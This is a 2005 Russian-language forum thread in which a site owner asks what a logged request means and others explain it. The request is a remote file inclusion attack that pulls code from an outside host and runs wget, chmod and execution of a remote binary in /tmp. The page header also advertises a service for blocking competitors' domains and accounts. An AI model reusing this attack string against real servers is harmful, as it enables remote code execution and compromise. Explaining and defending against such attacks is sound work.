пожалуста обьясните

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
пожалуста обьясните

Опции темы

Поиск в этой теме

Опции просмотра

пожалуста обьясните

23.12.2005, 04:40

~~forever777~~

Banned

Регистрация: 12.06.2005

Сообщений: 278

С нами: 11005958

Репутация: -1

пожалуста обьясните

setcms.org/index.php?option=com_c...&do_pdf=1&id=1index2.php? _REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|

что это значит они взломать хотят узнав куки?

𝕏 Twitter Reddit Telegram Копировать ссылку

23.12.2005, 05:03

Rebz

Флудер

Регистрация: 08.11.2004

Сообщений: 3,395

С нами: 11317286

Репутация: 3876

куки тут непричём.
поясняю пошагово:
...mosConfig_absolute_path=http://81.174.26.111/cmd.gif - это php-инклуюдинг.

далее идут команды:
cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|
заходят во временную папку /tmp/ через сайт.. скачивают файл listen, ставят чмод на этот файл 744, запускают listen.. дальше хз чё.. вывод YYY)
зы: listen - может оказаться бекдором, руткитом, эксплоитом... и т.д.

23.12.2005, 08:03

Dronga

ВАША реклама ТУТ!!

Регистрация: 01.07.2005

Сообщений: 647

С нами: 10978946

Репутация: 714

http://81.174.26.111/

Можешь посмотреть. Шелл они уже кстати удалили.

__________________
My ICQ: 296@463@859 ONLY!! Please check your list!!
И здесь могла бы быть ВАША реклама!!!

23.12.2005, 15:04

~~forever777~~

Banned

Регистрация: 12.06.2005

Сообщений: 278

С нами: 11005958

Репутация: -1

походу человек даже с античата

24.12.2005, 06:32

~~forever777~~

Banned

Регистрация: 12.06.2005

Сообщений: 278

С нами: 11005958

Репутация: -1

Зависит ли результат выполнения такого запроса от содержимого файла index.php ??? И если да то сто вы могужете порекомендовать, для предотвращения подобных запросов .